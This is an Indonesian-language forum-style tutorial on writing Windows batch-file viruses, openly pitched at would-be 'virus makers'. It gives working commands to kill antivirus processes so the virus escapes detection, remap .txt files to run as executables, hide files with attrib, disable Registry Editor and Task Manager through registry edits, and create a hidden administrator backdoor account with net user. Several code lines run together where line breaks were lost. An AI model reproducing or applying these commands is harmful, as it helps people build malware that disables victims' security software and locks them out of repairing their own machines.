kalo ada yang masih belum tau apa sih itu batch file
batchfile itu sendiri files yang dimana akan di exekusi dengan
command prompt atau cmd lah biasanya yang kita tau
so ini virus cuma berjalan di windows
jadi dalam pembuatannya kita juga mengunakan bahasa pemograman
Command Prompt ^^
nah berikut seperti ini contohnya:
1. tskill
untuk mematikan proses program yang sedang running
kenapa sih kok virus butuh ini ??
karena komputer mengetahui seuatu file itu virus atau bukan karena
anvir kan?? maka dengan ini bisa sajah virus mematikan proses anvir
agar si virus tidak bisa di diteksi
nah untuk tskill ada variasinya
tskill /A namaproses
tskill /v namaproses
nah ada bedanya /A dan /V
untuk /A dia mematikan proses tanpa menampilkan proses yang jalan
/v sebaliknya
contoh mudah kita membuka notepad kemudian buka cmd
kita tulis
tskill /A notepad
notepad akan mati prosesnya coba bedakan dengan
tskill /V notepad
maka akan di tampilkan End Process(7300)
nah itu cuma contoh , uoleh karena itu kita harus tau nama proses suatu aplikasi
nih contohnya
list nama dan dh gw mudahin
Code:
tskill /A avgtray
tskill /A norton
tskill /A Avkserv
tskill /A McAfee Firewall2.assoc
ini untuk asosiasi mengenai extensi jika kita mau ngeubah seuatu extensi misal
utuk files notepad sendiri yaitu text maka extension filenya .txt nah misal kita mau
ubah jadi .exe (executablefiles) sehigga ketika user memiliki files yang type .txt
jika di jalankan file tersebut tidak bisa di buka melaikan di jalankan sebagai executable
bahaya juga yah >_<
ok
Code:
assoc .extensifileawal=extensiygmaudirubahmsial code asli
assoc .txt=txtfile
maka misal
Code:
assoc .txt=exefilemaka ketika kita membuka suatu extensi yang bernama .txt akan di rubah menjadi extensi exe
untuk mengembalikannya lagi dengan
perintah yang sama
Code:
assoc .txt=txtfile3.attrib
ini untuk atribute suatu file atau folder misal untuk menghidden bisa kita mainkan
untuk - artinya menghilangkan dan + artinya menambahkan
contoh dasar misal
folder my music kita mau hiddden
Code:
attrib +h "%userprofile%\my documents\my music"untuk memgembalikannya lagi
Code:
attrib -h "%userprofile%\my documents\my music"nah untuk file jg sama dan biasanya untuk membalikan file yang terkena virus kita menguakan perintah
Code:
attrib -s -h -r *.* /s /ds =system
h =hidden
r =read only
*.* = semua
/s = proces matching files pada suatu folder
/d = proces folder
4.reg
atau regedit ^^ ini yang paling gw suka ,ini intinya asal kita tau letak2
key pada regedit kita bisa puas mengerjai system pada windows misal nih dasar ajah yah
buat mendisabled regedit dan taskmanager
Code:
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /fnah jadi ngk sebarangan kita untuk memasukan suatu value misal ada yang namanya Dword itu isinya kudu 1 atau 0
1 artinya memasukan 0 artinya mengkosongkan misal contoh atas kita memasukan nilai 1 berarti mengaktifkan
jika kita ubah jadi 0 maka tidak di jalankan
Code:
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 0 /f
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /fatau kalau mau hapus langsug jg bisa tingga di delete ajah folder nya bernama DisableRegistryTools dan DisableTaskMgr
yang beralamatkan di HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System ^^
itu bisa di kembangin sendiri oleh kalian .
jadi kalo mau jadi virus maker mau ngak mau kita belajar juga ttg lokasi2 regedit
5.backdoor
tidak seru kalo virus ngak bisa buat pintu belakang
nih untuk backdoor sendiri ada 2 type
ada yang masih bentuk administrator ada juga yang user
nah untuk administrator
dengan cara
Code:
net user Username Password /add
net localgroup administrators Username /addnah untuk Username dan Password
bisa tulis sendiri misal
Username : alldy
Password : newbie
Code:
net user sohai newbie /add
net localgroup administrator sohai /addnah untuk user
dengan cara
Code:
net user Username Password /addbisa tulis sendiri misal
Username : sohai
Password : 1234
#Ref http://hacker-newbie.org/
sekian dari ane mohon maaf kalo ada kata-kata yang kurang ,dan bisa di tambahkan lagi
oh iya untuk infeksi file mungkin nanti ajah yah ^^
